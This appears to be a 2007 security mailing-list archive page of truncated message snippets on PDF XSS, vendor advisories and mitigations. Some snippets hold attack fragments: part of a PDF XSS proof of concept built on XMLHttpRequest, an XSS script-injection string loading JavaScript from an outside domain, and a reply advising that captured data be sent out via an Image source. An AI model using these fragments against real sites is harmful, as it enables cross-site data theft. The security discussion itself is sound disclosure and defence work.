I'm most worried about the CSRF vector.
XSS attacks are easily preventable via a web app firewall, input
validation and/or session ID rotation; and I see a lot of frameworks
(like Drupal 4.7.4+) protect against CSRF via Form Keys and/or rotating
sessions. But I do not see a lot of custom
CALL FOR PAPERS
RAID 2007
10th International Symposium on
Recent Advances in Intrusion Detection 2007
September 5-7, 2007
Crowne
-- Forwarded message --
Date: Wed, 3 Jan 2007 20:11:34 -0600 (CST)
From: Gadi Evron [EMAIL PROTECTED]
To: funsec@linuxbox.org
Subject: [funsec] AV and Marketing Babes
We discussed NOD32's marketing with putting NOD32 protects your ass on
babes while playing sports (!!!) -
Sent to the wrong place sorry.
On 1/4/07, Am Razak [EMAIL PROTECTED] wrote:
Checked Google page
it says that entire URL will be transmitted to Google. If the site
authentication is posted on the URL, it will be captured by google.
GOOGLE SAYS..
12. What information is sent to
And the related OpenOffice Isue 70042 document opened on 2nd Oct is located at
http://www.openoffice.org/issues/show_bug.cgi?id=70042
These issues are fixed in version 2.1.
- Juha-Matti
Juha-Matti Laurio [EMAIL PROTECTED] wrote:
It appears that OpenOffice.org has issued a patch for WMF/EMF
Dear List,
Did anybody mention this does not work in Adobe Acrobat Reader 8 ?
--
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7
___
Full-Disclosure - We believe in it.
Charter:
Dear List,
Kevin Finistere and myself gave a Talk in Berlin 29th on Bluetooth
Hacking, we presented new implementation bugs as well as bugs/problems
deeply buried within the Protocol itself.
This mail to the list should represent a digest for those not able to
attend or able to view the stream.
According to public reports, this vulnerability is addressed in Adobe
Acrobat Reader 8.0.
I've actually tested it. On Reader 8 Acrobat you get a messagebox that
says This operation is not allowed
Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
Hi,
As the server side solution, force rewriting fragment identifiers in URI by
redirecion responce can be considered.
Disallow the directoly access to PDF on the server and return response such as:
--
Location: http://example.com/one-shot-url.pdf#top
--
As a result, fragment identifiers in URI
Additionally, the public PoC doesn't work on Preview version 3.0.8 (409) on OS
X 10.4.8.
- Juha-Matti
Larry Seltzer [EMAIL PROTECTED] wrote:
According to public reports, this vulnerability is addressed in Adobe
Acrobat Reader 8.0.
I've actually tested it. On Reader 8 Acrobat you get a
LS-20061102
LSsec has discovered a vulnerability in Business Objects Crystal Reports XI
Professional, which could be exploited by an attacker in order to execute
arbitrary
code on an affected system. Exploitation requires that the attacker coerce the
target user into opening a malicious .RPT
file:///C:/Program Files/Adobe/Acrobat
6.0/Resource/ENUtxt.pdf#something=javascript:function
cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return
new ActiveXObject('Microsoft.XMLHTTP');}catch(e){}try{return new
XMLHttpRequest();}catch(e){} return null;}var xhr =
Hello All,
I'm trying to find methodology for implementing intrusion prevention system
in my report. I'm reading about an improvement for system development life
cycle for information security. But it's really complicated for just a guide
how to implement intrusion prevention. Maybe someone
Shows up in a log like this:
127.0.0.1 - - [04/Jan/2007:10:57:03 -0500] GET
This input is literally weeks late, but I'm making the effort anyway.
To anyone on this list that actually knows me, I'd like to throw
in my personal encouragement to participate in Doctor/Professor/Mr.
Holt's research study. I know the guy personally. He's been to at
least one party at the
On Thu, 04 Jan 2007 23:01:42 +0700, Fajar Edisya Putera said:
I'm trying to find methodology for implementing intrusion prevention system
in my report. I'm reading about an improvement for system development life
cycle for information security. But it's really complicated for just a guide
how
DMA[2007-0104a] - 'iLife iPhoto Photocasing Format String Vulnerability'
Author: Kevin Finisterre
Vendor(s): http://www.apple.com
Product: 'iLife 06 (?)'
References:
http://www.digitalmunition.com/DMA[2007-0104a].txt
http://www.apple.com/ilife/iphoto/features/photocasting.html
Everybody knows about it. Everybody talks about it. We had a nice
party. It is time for estimating the damages. In this article I will
try to show the impact of the Universal PDF XSS vulnerability by
explaining how it can be used in real life situations.
I'm trying to put together a demonstration of this vulnerability, and how it
could effect corporate security, however I'm encountering a large hangup
when sending a file 'back' to the webserver, the browser same origin policy
denies me the ability to send files to a different domain, which afaik
Last night I came up with a proof of concept to exploit this locally:
http://ha.ckers.org/blog/20070103/pdf-xss-can-compromise-your-machine/
If you have Adobe 7.0 installed there is a at least one standard PDF
installed on the local drive. Ouch.
-RSnake
http://ha.ckers.org/
hello everybody,
recently, i've detected that gmx, a german freemail-provider (it offers
professional services too) is prone to a xss-vulnerability.
An attacker could send an email containing these string:
/textareascript src=http://somedomain.tld/somefile.js;
type=text/javascript
Because
We need to force to the users do download the pdf files
And we can add to the httpd.conf or .htaccess the next code
SetEnvIf Request_URI \.pdf$ requested_pdf=pdf
Header add Content-Disposition Attachment env=requested_pdf
Other solution is protect our pdf files to external links (hotlinking)
Hi dear list,
usual politeness
Happy new year, etc... ;)
/usual politness
I have apparently not attended any talk (besides those on RFID) Gadi did...
Technically speaking, the best talks I have seen (security wise) were :
* Unusual bugs by Ilja :
12. What information is sent to Google when I enable the Enhanced
Protection Feature?
When enabled, the entire URL of the site that you're visiting will be
securely transmitted to Google for evaluation. In addition, a very condensed
version of the page's content may be sent to compare
If I recall correctly from the Content-Disposition HTML attachment
handling vulnerabilities last year, Opera didn't reliably abide by the
Content-Disposition header.
Additionally, Content-Disposition support in IE, Firefox, Opera,
Safari and a few others was extremely inconsistent from version to
Be careful using either of those. REQUEST_URI can contain anything:
http://example.com/file.pdf?whatever#vectorgoeshere
For that example the request URI will be ..pathto..file.pdf?whatever
which does not match \.pdf$. Likewise the second one has issues,
including the fact that referrers are
===
Ubuntu Security Notice USN-398-3 January 04, 2007
firefox-themes-ubuntu regression
https://launchpad.net/bugs/76871
===
A security issue affects the following Ubuntu
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200701-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200701-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
A while ago, apparently angry with Larry Seltzer, I penned a quick
write-up on the possible issues with race conditions triggered by
asynchronous browser events (such as JavaScript timers) colliding with
synchronous content rendering:
http://seclists.org/vulnwatch/2006/q3/0023.html
This is in
A website that I am developing has had BackDoor-CUS!php uploaded to the
images directory. My faulty entirely due to permissions set.
This has resulted in
html
script language=javascript
I hope you're still not angry!
I just tried your demo on IE7. It took a while longer but does seem to
have locked up. Were you looking at IE6 or IE7, and is the behavior any
different?
Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
On Thu, 4 Jan 2007, Larry Seltzer wrote:
I hope you're still not angry!
It took months of therapy, but I recovered ;)
I just tried your demo on IE7. It took a while longer but does seem to
have locked up. Were you looking at IE6 or IE7, and is the behavior any
different?
I tested several
Well, that sure was informative.
My questions to what the advisory means are below. Can anyone answer or
correct this at all?
On 1/3/07, Cisco Systems Product Security Incident Response Team wrote:
Details
===
Unchangeable Shared Secret
+-
In order for Cisco
===
Ubuntu Security Notice USN-401-1 January 04, 2007
dbus vulnerability
CVE-2006-6107
===
A security issue affects the following Ubuntu releases:
Ubuntu 5.10
Ubuntu 6.06
I just skimmed through your code very quickly and I noticed a single
problem. Don't send the captured data with another XHR (xhr2). Use
images.
var img = new Image()
img.src = url;
this should work.
On 1/4/07, T Biehn [EMAIL PROTECTED] wrote:
I'm trying to put together a demonstration of this
On 04 Jan 07, at 13:37, Ian Shaw wrote:
A website that I am developing has had BackDoor-CUS!php uploaded to
the images directory. My faulty entirely due to permissions set.
This has resulted in
html
script language=javascript
===
Ubuntu Security Notice USN-400-1 January 04, 2007
mozilla-thunderbird vulnerabilities
CVE-2006-6497, CVE-2006-6498, CVE-2006-6499, CVE-2006-6501,
CVE-2006-6502, CVE-2006-6503, CVE-2006-6505
Andrew Farmer wrote:
All files are available on request, if anyone's interested in doing
some further analysis of their own.
That was fun :)
hi andrew, the main page try to load three different expoits:
- a variant of Java/ClassLoader (the applet)
- Internet Explorer (MDAC) Remote Code
39 matches
Mail list logo